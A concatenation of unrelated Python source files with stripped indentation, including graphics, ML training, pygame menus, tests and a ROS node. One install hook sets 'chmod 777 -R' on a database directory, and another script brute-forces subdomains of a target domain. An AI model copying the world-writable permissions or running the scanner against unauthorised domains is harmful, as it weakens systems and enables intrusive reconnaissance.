y = y0
while x <= x1:
plot(screen, color, x, y)
if d > 0:
y = y + 1
d = d - dx
x = x + 1
d = d + dy
else:
d = 0
x = x0
y = y0
while y <= y1:
plot(screen, color, x, y)
if d > 0:
x = x + 1
d = d - dy
y = y + 1
d = d + dx
|
import random, sys, os, math, numpy
#Eggholder Function
def run(Arr):
x=Arr[0]
y=Arr[1]
return -(y+47)*numpy.sin(numpy.sqrt(numpy.fabs(x/2+y+47)))-x*numpy.sin(numpy.sqrt(numpy.fabs(x-y-47)))
#print run(512,404.2319)
def check(Arr,T,Z=[0]):
xmax=512
xmin=-512
if T==0:
return 1
elif T==1:
Range=numpy.zeros((Z[0],Z[1],2))
for i in range(len(Range[0])):
Range[0][i][0]=xmin
Range[0][i][1]=xmax
return Range
|
from data.constants import *
from data.sprites import *
menu_sprites_dir = path.join(SPRITES_DIR, "menu/")
length_line = 20
line_point = 200 // 100
volume_size = 10
class MainImage1:
def __init__(self):
self.image = transform.scale(image.load(menu_sprites_dir + "main_image1.png"), (175, 250))
self.rect = self.image.get_rect(center=(WIN_WIDTH // 2 - 75, WIN_HEIGHT // 2 - 110))
class MainImage2:
def __init__(self):
self.image = transform.scale(image.load(menu_sprites_dir + "main_image2.png"), (150, 225))
self.rect = self.image.get_rect(center=(WIN_WIDTH // 2 + 75, WIN_HEIGHT // 2 - 80))
class Play(sprite.Sprite):
def __init__(self):
sprite.Sprite.__init__(self)
self.image = image.load(menu_sprites_dir + "play.png")
self.rect = self.image.get_rect(center=(WIN_WIDTH // 2, WIN_HEIGHT // 2 + 70))
class Settings(sprite.Sprite):
def __init__(self):
sprite.Sprite.__init__(self)
self.image = image.load(menu_sprites_dir + "settings.png")
self.rect = self.image.get_rect(center=(WIN_WIDTH // 2, WIN_HEIGHT // 2 + 110))
class Exit(sprite.Sprite):
def __init__(self):
sprite.Sprite.__init__(self)
self.image = image.load(menu_sprites_dir + "exit.png")
self.rect = self.image.get_rect(center=(WIN_WIDTH // 2, WIN_HEIGHT // 2 + 190))
class Back(sprite.Sprite):
def __init__(self):
sprite.Sprite.__init__(self)
self.image = image.load(menu_sprites_dir + "back.png")
self.rect = self.image.get_rect(center=(WIN_WIDTH // 2, WIN_HEIGHT // 2 + 190))
class Level1(sprite.Sprite):
def __init__(self):
sprite.Sprite.__init__(self)
self.image = image.load(menu_sprites_dir + "level1.png")
self.rect = self.image.get_rect(center=(WIN_WIDTH // 2, WIN_HEIGHT // 2 + 70))
class Level2(sprite.Sprite):
def __init__(self):
sprite.Sprite.__init__(self)
self.image = image.load(menu_sprites_dir + "level2.png")
self.rect = self.image.get_rect(center=(WIN_WIDTH // 2, WIN_HEIGHT // 2 + 110))
class Volume(sprite.Sprite):
global length_line, volume_size
def __init__(self):
sprite.Sprite.__init__(self)
self.image = Surface((350, 30))
self.rect = self.image.get_rect(center=(WIN_WIDTH // 2, WIN_HEIGHT // 2 + 100))
self.bg_volume_line = Surface((200, self.image.get_height()))
self.rect_bg_volume_line = self.bg_volume_line.get_rect()
self.rect_sc_bg_volume_line = Rect((WIN_WIDTH // 2 - self.image.get_width() // 2,
WIN_HEIGHT // 2 + 100 - self.image.get_height() // 2,
self.bg_volume_line.get_width(), self.bg_volume_line.get_height()))
self.volume_line = Surface((length_line, self.image.get_height()))
self.rect_volume_line = self.volume_line.get_rect()
self.font = font.Font(None, 30)
self.volume_text = self.font.render(str(volume_size) + " volume", 1, WHITE)
self.rect_volume_text = self.volume_text.get_rect(center=(275, 16))
def update_volume_line(events):
global length_line, volume_size, line_point
volume = Volume()
volume.image.set_colorkey(BLACK)
volume.volume_line.fill(RED)
volume.bg_volume_line.fill(WHITE)
volume.bg_volume_line.blit(volume.volume_line, volume.rect_volume_line)
volume.image.blit(volume.bg_volume_line, volume.rect_bg_volume_line)
volume.image.blit(volume.volume_text, volume.rect_volume_text)
pressed = key.get_pressed()
if pressed[K_LEFT]:
if length_line > 0:
length_line -= line_point
volume_size -= 1
elif pressed[K_RIGHT]:
if length_line < 177:
length_line += line_point
volume_size += 1
for i in events:
if i.type == MOUSEBUTTONDOWN:
if volume.rect_sc_bg_volume_line.collidepoint(i.pos[0], i.pos[1]):
length_line = i.pos[0] - WIN_WIDTH // 2 + volume.image.get_width() // 2
volume_size = length_line // line_point
return volume
def draw_volume_line(screen, clock, events):
volume = update_volume_line(events)
screen.blit(volume.image, volume.rect)
display.flip()
clock.tick(FPS)
class MenuTime(sprite.Sprite):
def __init__(self):
sprite.Sprite.__init__(self)
self.image = transform.scale(image.load(menu_sprites_dir + "menu.png"), (WIN_WIDTH, WIN_HEIGHT))
self.rect = self.image.get_rect()
self.play = Play()
self.settings = Settings()
self.exit = Exit()
self.mainImage1 = MainImage1()
self.mainImage2 = MainImage2()
class MenuGameOver(sprite.Sprite):
def __init__(self):
sprite.Sprite.__init__(self)
self.image = transform.scale(image.load(menu_sprites_dir + "menu.png"), (WIN_WIDTH, WIN_HEIGHT))
def menu_update():
menu = MenuTime()
menu.image.blit(menu.mainImage2.image, menu.mainImage2.rect)
menu.image.blit(menu.mainImage1.image, menu.mainImage1.rect)
menu.image.blit(menu.play.image, menu.play.rect)
menu.image.blit(menu.settings.image, menu.settings.rect)
menu.image.blit(menu.exit.image, menu.exit.rect)
return menu
def menu_draw(screen, clock):
menu_alive = True
while menu_alive:
menu = menu_update()
screen.blit(menu.image, menu.rect)
display.flip()
clock.tick(FPS)
for i in event.get():
if i.type == QUIT or i.type == KEYDOWN and i.key == K_ESCAPE:
exit()
elif i.type == MOUSEBUTTONDOWN:
if menu.play.rect.collidepoint(i.pos):
choice = level_menu_draw(screen, clock)
if choice != 0:
return choice
if menu.settings.rect.collidepoint(i.pos):
settings_draw(screen, clock)
if menu.exit.rect.collidepoint(i.pos):
exit()
class SettingsTime(sprite.Sprite):
def __init__(self):
sprite.Sprite.__init__(self)
self.image = transform.scale(image.load(menu_sprites_dir + "menu.png"), (WIN_WIDTH, WIN_HEIGHT))
self.rect = self.image.get_rect()
self.back = Back()
self.mainImage1 = MainImage1()
self.mainImage2 = MainImage2()
def settings_update(clock, events):
settings = SettingsTime()
settings.image.blit(settings.mainImage2.image, settings.mainImage2.rect)
settings.image.blit(settings.mainImage1.image, settings.mainImage1.rect)
draw_volume_line(settings.image, clock, events)
settings.image.blit(settings.back.image, settings.back.rect)
return settings
def settings_draw(screen, clock):
settings_alive = True
while settings_alive:
events = event.get()
mixer.music.set_volume(volume_size / 100)
settings = settings_update(clock, events)
screen.blit(settings.image, settings.rect)
display.flip()
clock.tick(FPS)
for i in events:
if i.type == QUIT:
exit()
elif i.type == KEYDOWN and i.key == K_ESCAPE:
settings_alive = False
elif i.type == MOUSEBUTTONDOWN:
if settings.back.rect.collidepoint(i.pos):
settings_alive = False
class LevelMenuTime(sprite.Sprite):
def __init__(self):
sprite.Sprite.__init__(self)
self.image = transform.scale(image.load(menu_sprites_dir + "menu.png"), (WIN_WIDTH, WIN_HEIGHT))
self.rect = self.image.get_rect()
self.level1 = Level1()
self.level2 = Level2()
self.back = Back()
self.mainImage1 = MainImage1()
self.mainImage2 = MainImage2()
def level_menu_update():
level_menu = LevelMenuTime()
level_menu.image.blit(level_menu.mainImage2.image, level_menu.mainImage2.rect)
level_menu.image.blit(level_menu.mainImage1.image, level_menu.mainImage1.rect)
level_menu.image.blit(level_menu.level1.image, level_menu.level1.rect)
level_menu.image.blit(level_menu.level2.image, level_menu.level2.rect)
level_menu.image.blit(level_menu.back.image, level_menu.back.rect)
return level_menu
def level_menu_draw(screen, clock):
level_menu_alive = True
while level_menu_alive:
level_menu = level_menu_update()
screen.blit(level_menu.image, level_menu.rect)
display.flip()
clock.tick(FPS)
for i in event.get():
if i.type == QUIT:
exit()
elif i.type == KEYDOWN and i.key == K_ESCAPE:
return 0
elif i.type == MOUSEBUTTONDOWN:
if level_menu.level1.rect.collidepoint(i.pos):
return 1
if level_menu.level2.rect.collidepoint(i.pos):
return 2
if level_menu.back.rect.collidepoint(i.pos):
return 0
|
"""def floating(n) :
x = 1
for i in n :
x = x * i
print(x)
s = 0
m = 0
for i in n :
m = x/i
print(m)
s = s + m
print(s)
m = [1, 2, 3, 6]
floating(m) """
for i in range(1, 10) :
print(pow(i , 2))
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright © 2007 TUBITAK/UEKAE
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/copyleft/gpl.txt.
import os
def postInstall(fromVersion, fromRelease, toVersion, toRelease):
os.system("chmod 777 -R /opt/TurquazLinux08Beta5/database")
|
import numpy as np
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import os
import cv2
import matplotlib.pyplot as plt
REBUILD_DATA = True
class HindiAlphabets():
IMG_SIZE = 50
KA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_1_ka"
KHA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_2_kha"
GA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_3_ga"
GHA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_4_gha"
KNA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_5_kna"
CHA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_6_cha"
CHHA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_7_chha"
JA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_8_ja"
JHA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_9_jha"
YNA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_10_yna"
TAA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_11_taamatar"
THAA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_12_thaa"
DAA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_13_daa"
DHAA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_14_dhaa"
ADNA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_15_adna"
TA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_16_tabala"
THA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_17_tha"
DA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_18_da"
DHA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_19_dha"
NA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_20_na"
PA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_21_pa"
PHA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_22_pha"
BA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_23_ba"
BHA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_24_bha"
MA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_25_ma"
YAW = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_26_yaw"
RA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_27_ra"
LA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_28_la"
WAW = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_29_waw"
SAW = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_30_motosaw"
SHA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_31_petchiryakha"
SAW = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_32_patalosaw"
HA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_33_ha"
CHHYA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_34_chhya"
TRA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_35_tra"
GYA = "C:/Users/Divesh/pytorch proj/Hindi-Alphabet-Recognition/DevanagariHandwrittenCharacterDataset/character_36_gya"
IMG_SIZE = 50
LABELS = {KA:1,KHA:2,GA:3,GHA:4,KNA:5,CHA:6,CHHA:7,JA:8,JHA:9,YNA:10,TAA:11,THAA:12,DAA:13,DHAA:14,ADNA:15,TA:16,THA:17,DA:18,DHA:19,NA:20,PA:21,PHA:22,BA:23,BHA:24,MA:25,YAW:26,RA:27,LA:28,WAW:29,SAW:30,SHA:31,SAW:32,HA:33,CHHYA:34,TRA:35,GYA:36}
training_data = []
def make_training_data(self):
for label in self.LABELS:
for f in tqdm( os.listdir(label)) :
try:
path = os.path.join(label,f)
img = cv2.imread(path,cv2.IMREAD_GRAYSCALE)
img = cv2.resize(img,(self.IMG_SIZE,self.IMG_SIZE))
self.training_data.append([np.array(img),np.eye(36)[self.LABELS[label]]])
except Exception as e:
pass
np.random.shuffle(self.training_data)
np.save("training_data.npy",self.training_data)
if REBUILD_DATA:
alphabet = HindiAlphabets()
alphabet.make_training_data()
training_data = np.load("training_data.npy",allow_pickle=True)
plt.imshow(training_data[2][0],cmap = "gray")
plt.show()
class Net(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(1,32,5)
self.conv2 = nn.Conv2d(32,64,5)
self.conv3 = nn.Conv2d(64,128,5)
x = torch.randn(50,50).view(-1,1,50,50)
self._to_linear = None
self.convs(x)
self.fc1 = nn.Linear(self._to_linear,512)
self.fc2 = nn.Linear(512,36)
def convs(self,x):
x = F.max_pool2d(F.relu(self.conv1(x)),(2,2))
x = F.max_pool2d(F.relu(self.conv2(x)),(2,2))
x = F.max_pool2d(F.relu(self.conv3(x)),(2,2))
if self._to_linear is None:
self._to_linear = x[0].shape[0]*x[0].shape[1]*x[0].shape[2]
return x
def forward(self,x):
x = self.convs(x)
x = x.view(-1,self._to_linear)
x = F.relu(self.fc1(x))
x = self.fc2(x)
return F.softmax(x,dim=1)
net = Net()
optimizer = optim.Adam(net.parameters(),lr = 0.001)
loss_function = nn.MSELoss()
X = torch.Tensor([i[0] for i in training_data]).view(-1,50,50)
X =X/255.0
y = torch.Tensor([i[1] for i in training_data])
VAL_PCT = 0.1
val_size = int(len(X)*VAL_PCT)
print(val_size)
train_X = X[:-val_size]
train_y = y[:-val_size]
test_X = X[-val_size:]
test_y = y[-val_size:]
print(len(train_X))
print(len(test_X))
BATCH_SIZE = 100
EPOCHS = 2
for epoch in range(EPOCHS):
for i in tqdm(range(0,len(train_X),BATCH_SIZE)):
batch_X = train_X[i:i+BATCH_SIZE].view(-1,1,50,50)
batch_y = train_y[i:i+BATCH_SIZE]
net.zero_grad()
outputs = net(batch_X)
loss = loss_function(outputs,batch_y)
loss.backward()
optimizer.step()
print(loss)
correct = 0
total = 0
with torch.no_grad():
for i in tqdm(range(len(test_X))):
real_class = torch.argmax(test_y[i])
net_out = net(test_X[i].view(-1,1,50,50))[0]
predicted_class = torch.argmax(net_out)
if predicted_class == real_class:
correct+=1
total+=1
print(" Accuracy = ",round(correct/total,3))
|
import random
from lab8.logic import *
from lab8.repository import *
from lab8.network import NeuralNetwork
class Controller:
def __init__(self, repo):
self.repo = repo
self.network = NeuralNetwork(3)
def train(self, iterations):
points = self.repo.fetchEntries()
for i in range(iterations):
self.network.trainInputs(points)
print(self.network.loss)
return self.network.loss
def test(self):
results = []
points = self.repo.fetchEntries()
for entry in points:
realValue = entry[-1]
computedValue = self.network.feedForward(entry)
results.append((entry[:5], entry[-1], computedValue, abs(realValue - computedValue)))
return results |
# Script for scraping website
# import Python module to deal with websites
import urllib2
# import BeautifulSoup to scrape websites
from bs4 import BeautifulSoup
# these next lines read the website into BeautifulSoup
url = "http://www.house.gov/representatives"
page = urllib2.urlopen(url)
soup = BeautifulSoup(page)
page.close()
# a variable (called menu) grabs congressmen listed by last name
menu = soup.find_all("div", {"id":"byName"})
print menu
|
# cards have four fields:
# t : type from f', 'm', 'p' (free format, multiple choice, pattern matching)
# q : the question they initially present with
# a : the correct answer <-- IF MULTIPLE CHOICE THE CORRECT CHOICE GOES HERE
# m : the other choices (if multiple choice)
# n : any info displayed AFTER the answer is submitted
# cards have this finite state flow: --> present question (q && m). receive and validate user input against (a). display info (n)
card_data = [
{
't' : 'f',
'q' : 'Why is choux handsome?',
'a' : 'maru',
'n' : 'did you know: maru is too.'
},
{
't' : 'm',
'q' : 'If ken and linus had a h@cker duel, who would win?',
'a' : 'linus',
'm' : ['other option', 'yet another', 'one more'],
'n' : "You don't want to be a nag, do you?"
},
{
't' : 'p',
'q' : 'The pattern "xxa" should be matched',
'a' : ["xxa", "XXA"]
},
]
|
#!/usr/bin/env python3
import dns.resolver
import mysql.connector
import concurrent.futures
import keys
def a_lookup(record):
try:
answers = dns.resolver.query(record, 'A')
for ip in answers:
return ip
except Exception as e:
return "0.0.0.0"
def main(domain, table):
with open("subs.txt", "r") as f:
file = f.read().split()
subdomains = []
for line in file:
subdomains.append(line.strip() + "." + domain)
records = {}
with concurrent.futures.ThreadPoolExecutor(max_workers=100) as executor:
future_to_ip = {executor.submit(a_lookup, record): record for record in subdomains}
for future in concurrent.futures.as_completed(future_to_ip):
record = future_to_ip[future]
try:
records[record] = future.result()
except Exception as e:
print("[!] ERROR: %s" % e)
actual_records = {}
try:
mydb = mysql.connector.connect(
host="localhost",
user=f"{keys.mysql_username}",
passwd=f"{keys.mysql_password}",
database="reconb"
)
mycursor = mydb.cursor()
for key, value in records.items():
if "0.0.0.0" in str(value):
continue
else:
actual_records[key] = str(value)
for key, value in actual_records.items():
sql = f"INSERT INTO {table}_services (Subdomain, Ip, ModuleName) VALUES (%s, %s, %s)"
val = (key, value, 'Bruteforce')
mycursor.execute(sql, val)
mydb.commit()
except mysql.connector.errors.Error as e:
print(f"Mysql Error: {e}")
finally:
print(f"bruteforce added to table")
# main("domain.com", "table")
|
from random import randint
import pytest
from bson import ObjectId
from faker import Faker
from pymongo.collection import Collection
from module_11.personal_app.db import get_db
_FAKE_TASK_ID = str(ObjectId())
fake = Faker()
def _get_test_user_collection() -> Collection:
db = get_db()
user_collection: Collection = db.user
test_user = user_collection.find_one({'username': 'test'})
return getattr(db, test_user['todo_collection'])
def _generate_task(join_number):
result = []
for _ in range(join_number):
result.append(fake.text(max_nb_chars=randint(10, 120)))
return ';'.join(result)
def test_index(app, client, auth_test):
response = client.get('/', follow_redirects=True)
assert response.status_code == 200
assert b"Log In" in response.data
assert b"Register" in response.data
auth_test.login()
response = client.get('/')
assert response.status_code == 200
response_html = response.data
assert b'Log Out' in response_html
@pytest.mark.parametrize('path', (
'/create',
f'/{_FAKE_TASK_ID}/mark_done',
f'/{_FAKE_TASK_ID}/delete',
))
def test_login_required(client, path):
response = client.post(path)
assert response.headers['Location'] == 'http://localhost/auth/login'
@pytest.mark.parametrize('path', (
f'/{_FAKE_TASK_ID}/delete',
f'/{_FAKE_TASK_ID}/mark_done',
'/asdasdf/mark_done',
'/asdasdf/delete',
))
def test_exists_required(client, auth_test, path):
auth_test.login()
assert client.post(path).status_code == 404
@pytest.mark.parametrize('done', (
True,
False,
))
def test_mark_done(app, client, auth_test, done):
path = '/{}/mark_done'
_id = None
with app.app_context():
todo_collection: Collection = _get_test_user_collection()
todo = todo_collection.find_one({'done': done})
_id = todo['_id']
path = path.format(str(_id))
auth_test.login()
response = client.post(path, follow_redirects=True)
assert response.status_code == 200
with app.app_context():
todo_collection: Collection = _get_test_user_collection()
todo = todo_collection.find_one({'_id': ObjectId(_id)})
assert todo['done']
def test_delete(app, client, auth_test):
path = '/{}/delete'
_id = None
with app.app_context():
todo_collection: Collection = _get_test_user_collection()
todo = todo_collection.find_one()
_id = todo['_id']
path = path.format(str(_id))
auth_test.login()
response = client.post(path, follow_redirects=True)
assert response.status_code == 200
with app.app_context():
todo_collection: Collection = _get_test_user_collection()
todo = todo_collection.find_one({'_id': ObjectId(_id)})
assert todo is None
@pytest.mark.parametrize('task', [
_generate_task(randint(1, 5))
for _ in range(10)
])
def test_create(app, client, auth_test, task):
path = '/create'
auth_test.login()
title, *rest = task.split(';')
response = client.post(path, data={'task': task}, follow_redirects=True)
assert response.status_code == 200
with app.app_context():
todo_collection: Collection = _get_test_user_collection()
todo = todo_collection.find_one({'title': title})
assert todo is not None
max_priority = list(todo_collection.aggregate(
[
{
"$group": {
"_id": None,
"max_priority": {"$max": "$priority"}
}
},
]
))[0]
assert todo['priority'] == max_priority['max_priority']
|
def test__classify_score_with_score_eq_ineligible(calculator):
assert calculator._RiskCalculator__classify_score("ineligible") == "ineligible"
def test__classify_score_with_score_lt_zero(calculator):
assert calculator._RiskCalculator__classify_score(-1) == "economic"
def test__classify_score_with_score_eq_zero(calculator):
assert calculator._RiskCalculator__classify_score(0) == "economic"
def test__classify_score_with_score_eq_1(calculator):
assert calculator._RiskCalculator__classify_score(1) == "regular"
def test__classify_score_with_score_eq_2(calculator):
assert calculator._RiskCalculator__classify_score(2) == "regular"
def test__classify_score_with_score_eq_3(calculator):
assert calculator._RiskCalculator__classify_score(3) == "responsible"
|
from numpy import*
nm = array(eval(input("n de matriculas:")))
impar = 0
for i in range(0,size(nm)):
if(nm[i] % 2 == 1 ):
impar = impar + 1
g2 = zeros(impar, dtype=int)
a = 0
for i in range(0,size(nm)):
if(nm[i] % 2 == 1):
if(a < size(g2)):
g2[a] = nm[i]
a = a + 1
print(g2) |
def 소수판별함수(n) :
success = True
for t in range( 2, n, 1) :
if n%t == 0 :
return False
return True
n = int(input("어떤 수를 판별해줄까요? "))
result = 소수판별함수( n )
if result==True :
print("소수입니다.")
else :
print("소수가 아닙니다.")
|
from typing import List
class Solution:
def diffWaysToCompute(self, input: str) -> List[int]:
res = []
N = len(input)
for i in range(N):
if input[i] in "+-*":
lefts = self.diffWaysToCompute(input[:i])
rights = self.diffWaysToCompute(input[i+1:])
for left in lefts:
for right in rights:
if input[i] == '+':
res.append(left + right)
elif input[i] == '-':
res.append(left - right)
elif input[i] == '*':
res.append(left * right)
if not res: res.append(int(input))
return res
if __name__ == '__main__':
print(Solution().diffWaysToCompute(
"2-1-1"
))
|
List = ['chocolate','biscuit','cola','water','noodles','flour','icecream','sugar']
user = {
'user_id' : 101,
'cart' : []
}
while True:
print('\nMain Menu\n')
menu = ['list of items','your cart']
for i in range(len(menu)):
print(f"{i+1}.{menu[i]}")
print('0.exit')
choice = int(input('\nselect an option:'))
if choice == 0:
print('Thank you')
exit()
elif choice == 1:
items = list(set(List) - set(user['cart']))
for i in range(len(items)):
print(f'{i+1}.{items[i]}')
ch = int(input('\nSelect an option:'))
user['cart'].append(List[ch-1])
print(f'Thanks for adding {items[ch]} into your cart')
elif choice == 2:
print ('\nYour Cart')
x = user['cart']
for i in range(len(x)):
print(f'{i+1}.{x[i]}')
|
from rest_framework import serializers
from .models import Item, Notification, Sale, SaleItem, Customer, Report, Staff
class ItemSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Item
fields = ('id', 'code', 'name', 'price', 'quantity',
'warning_quantity', 'is_chemical', 'pack_size', 'for_sale')
lookup_field = 'code'
class NotificationSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Notification
fields = ('id', 'user_id', 'text', 'created_date', 'notification_type',
'link', 'seen')
class SaleItemSerializer(serializers.HyperlinkedModelSerializer):
item = serializers.SlugRelatedField(queryset=Item.objects.all(),
slug_field='code')
item_name = serializers.StringRelatedField(source='item')
class Meta:
model = SaleItem
fields = (
'id',
'item',
'sale_price',
'quantity',
'returned_quantity',
'item_name',
)
class SaleSerializer(serializers.HyperlinkedModelSerializer):
saleitem_set = SaleItemSerializer(many=True)
customer = serializers.StringRelatedField()
class Meta:
model = Sale
fields = (
'id',
'datetime',
'customer',
'customer_id',
'saleitem_set',
)
class CustomerSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Customer
fields = (
'user_id',
'first_name',
'last_name',
'charge_code',
'pays_vat',
'allowed_chemicals',
)
class ReportSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Report
fields = (
'id',
'filename',
'report_type',
'created_date'
)
|
#!/usr/bin/env python
# Use joystick input to launch object-tracking nodes in jackal
#
# Intro to Robotics - EE5900 - Spring 2017
# Assignment #6
#
# Project #6 Group #2
# Prithvi
# Aswin
# Akhil (Team Lead)
#
# version: v1.3
# define imports
import rospy
import roslaunch
import sys
import time
import os
from sensor_msgs.msg import Joy
# class to read joystick messages and launch node
class joy_control(object):
# define self routine
def __init__(self):
# define subscriber
rospy.Subscriber("/bluetooth_teleop/joy", Joy, self.joy_callback)
rate = rospy.Rate(5)
rospy.loginfo('started joystick routine..')
# define and init variables
self.person_following_start = False
self.person_following_stop = False
self.wall_following_start = False
self.wall_following_stop = False
# configure node roslaunch api
package = 'quad_pkg'
executable_person_following = 'person_following.py'
node_person_following = roslaunch.core.Node(package, executable_person_following)
executable_wall_following = 'person_following.py'
node_wall_following = roslaunch.core.Node(package, executable_wall_following)
launch = roslaunch.scriptapi.ROSLaunch()
launch.start()
while not rospy.is_shutdown():
# if start flag set: launch main launch-file
if self.person_following_start:
#launch = roslaunch.scriptapi.ROSLaunch()
#launch.start()
person_following_process = launch.launch(node_person_following)
# if stop flag set: shutdown main launch-file
if self.person_following_stop:
person_following_process.stop()
if self.wall_following_start:
#launch = roslaunch.scriptapi.ROSLaunch()
#launch.start()
wall_following_process = launch.launch(node_wall_following)
# if stop flag set: shutdown main launch-file
if self.wall_following_stop:
wall_following_process.stop()
# reset trigger
self.person_following_start = False
self.person_following_stop = False
self.wall_following_start = False
self.wall_following_stop = False
rate.sleep()
# joystick callback routine
def joy_callback(self, data):
# define joystick buttons
x, circ, sq, tri, L1, R1, share, options, p4, L3, R3, DL, DR, DU, DD = data.buttons
llr, lud, L2, rlr, rud, R2 = data.axes
# Start object tracking
if (circ == 1) and (self.person_following_start == False):
rospy.loginfo("Starting the predator routine...")
# set the start flag
self.person_following_start = True
# Stop tracking
if (x == 1):
rospy.loginfo("Terminating the predator routine...")
# set stop flag
self.person_following_stop = True
# Start object tracking
if (sq == 1) and (self.wall_following_start == False):
rospy.loginfo("Starting the predator routine 2...")
# set the start flag
self.wall_following_start = True
# Stop tracking
if (tri == 1):
rospy.loginfo("Terminating the predator routine 2...")
# set stop flag
self.wall_following_stop = True
# standard boilerplate
if __name__ == "__main__":
try:
rospy.init_node("joy_start", anonymous=False)
#read in joystick input
run = joy_control()
except rospy.ROSInterruptException:
rospy.loginfo("joy_start node terminated.")
|
"""Setup source space.
Set up source space for forward and inverse computation.
"""
from types import SimpleNamespace
import mne
from ..._config_utils import get_fs_subject, get_fs_subjects_dir, get_subjects
from ..._logging import logger, gen_log_kwargs
from ..._run import failsafe_run, save_logs, _prep_out_files
from ..._parallel import parallel_func, get_parallel_backend
def get_input_fnames_setup_source_space(*, cfg, subject):
in_files = dict()
surf_path = cfg.fs_subjects_dir / cfg.fs_subject / "surf"
for hemi in ("lh", "rh"):
for kind in ("sphere", "sphere.reg", "white"):
in_files["surf-{hemi}-{kind}"] = surf_path / f"{hemi}.{kind}"
return in_files
def get_output_fnames_setup_source_space(*, cfg, subject):
out_files = dict()
out_files["src"] = (
cfg.fs_subjects_dir
/ cfg.fs_subject
/ "bem"
/ f"{cfg.fs_subject}-{cfg.spacing}-src.fif"
)
return out_files
@failsafe_run(
get_input_fnames=get_input_fnames_setup_source_space,
get_output_fnames=get_output_fnames_setup_source_space,
)
def run_setup_source_space(
*,
cfg: SimpleNamespace,
exec_params: SimpleNamespace,
subject: str,
in_files: dict,
) -> dict:
msg = f"Creating source space with spacing {repr(cfg.spacing)}"
logger.info(**gen_log_kwargs(message=msg, subject=subject))
src = mne.setup_source_space(
cfg.fs_subject,
spacing=cfg.spacing,
subjects_dir=cfg.fs_subjects_dir,
add_dist="patch",
)
in_files.clear() # all used by setup_source_space
out_files = get_output_fnames_setup_source_space(cfg=cfg, subject=subject)
mne.write_source_spaces(out_files["src"], src, overwrite=True)
return _prep_out_files(exec_params=exec_params, out_files=out_files)
def get_config(
*,
config: SimpleNamespace,
subject: str,
) -> SimpleNamespace:
cfg = SimpleNamespace(
spacing=config.spacing,
use_template_mri=config.use_template_mri,
fs_subject=get_fs_subject(config=config, subject=subject),
fs_subjects_dir=get_fs_subjects_dir(config),
)
return cfg
def main(*, config: SimpleNamespace) -> None:
